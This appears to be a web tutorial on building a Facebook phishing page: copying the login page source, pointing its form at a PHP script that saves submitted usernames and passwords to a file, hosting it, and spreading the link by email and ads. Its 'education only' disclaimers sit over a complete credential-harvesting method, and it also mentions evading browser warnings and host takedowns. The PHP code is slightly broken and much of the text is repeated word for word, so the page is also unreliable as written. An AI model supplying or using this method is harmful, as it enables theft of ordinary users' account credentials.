How To Make Phishing Page In Android

In this tutorial, we're going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users' Facebook accounts. However, and I can't stress this enough, this knowledge should never be used to attack others in the real world. It simply isn't legal, and it isn't moral, either. If you've ever had your username or password stolen, you know how bad it feels when others have violated your privacy.

• Phishing Page For Facebook
• How To Make Phishing Site
• Phishing Page Maker

In this article, I will show to create a facebook phishing page. To create phishing page, go to the Facebook.com and then right-click on the blank area, you will see the option view source page. In phishing, an attacker creates a look alike page of any popular website and sends it to the victim. When the victim enters his login info, the attacker gets the credentials. Do note that it is illegal to it. And this article is for education purposes only. Phishing is the popular method to hack Facebook but with a lot of problems these days concerning browsers that detects and warns users. For a free hosting company like 000webhost that suspends any phishing page. I have found a solution that will make the page undetectable and won't get suspended.

Phishing Page For Facebook

If you're reading this with the hopes of learning how to gain access to countless users' Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.

What is Phishing?

Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:

A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There's just one problem. The user, who is really the attacker's victim, actually entered their private information into a hacker's website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.

However, the hacker can now wreak ungodly amounts of havoc on a person's social life. If it happens to be a business's Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let's take a closer look at the steps required.

1. Pull up Facebook.com in your browser. Then, right click on the website's login page. You should see an option along the lines of 'view source page.' Click on this option and you should be able to view the code behind this page.
2. Go ahead and dump all of the page's source code into Notepad (or your operating system's best simple text editor).
3. If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
4. You should see a line that looks like this: action='https://www.facebook.com/login.php?login_attempt=1″
5. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action='post.php'
6. Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
7. Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

header (‘Location:http://www.facebook.com/');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>

How To Make Phishing Site

1. At this point, you should now have two files saved: index.htm and post.php.
2. Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn't recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we'll be using Bluehost.
3. After you have signed up for an account, browse to the control panel, and then to file manager.
4. Once the window opens, go to publick_html.
5. Delete default.php, and then upload index.htm and post.php.
6. Next, click on a preview of index.htm. As you'll notice, it should look nearly identical to the Facebook login page.
7. The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
8. Now go back to the file manager and public_html. There should be a file labeled username.txt.
9. Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts

Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:

A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There's just one problem. The user, who is really the attacker's victim, actually entered their private information into a hacker's website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.

However, the hacker can now wreak ungodly amounts of havoc on a person's social life. If it happens to be a business's Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let's take a closer look at the steps required.

1. Pull up Facebook.com in your browser. Then, right click on the website's login page. You should see an option along the lines of 'view source page.' Click on this option and you should be able to view the code behind this page.
2. Go ahead and dump all of the page's source code into Notepad (or your operating system's best simple text editor).
3. If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
4. You should see a line that looks like this: action='https://www.facebook.com/login.php?login_attempt=1″
5. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action='post.php'
6. Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
7. Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

header (‘Location:http://www.facebook.com/');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>

How To Make Phishing Site

1. At this point, you should now have two files saved: index.htm and post.php.
2. Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn't recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we'll be using Bluehost.
3. After you have signed up for an account, browse to the control panel, and then to file manager.
4. Once the window opens, go to publick_html.
5. Delete default.php, and then upload index.htm and post.php.
6. Next, click on a preview of index.htm. As you'll notice, it should look nearly identical to the Facebook login page.
7. The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
8. Now go back to the file manager and public_html. There should be a file labeled username.txt.
9. Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts

Phishing Page Maker

It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don't try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.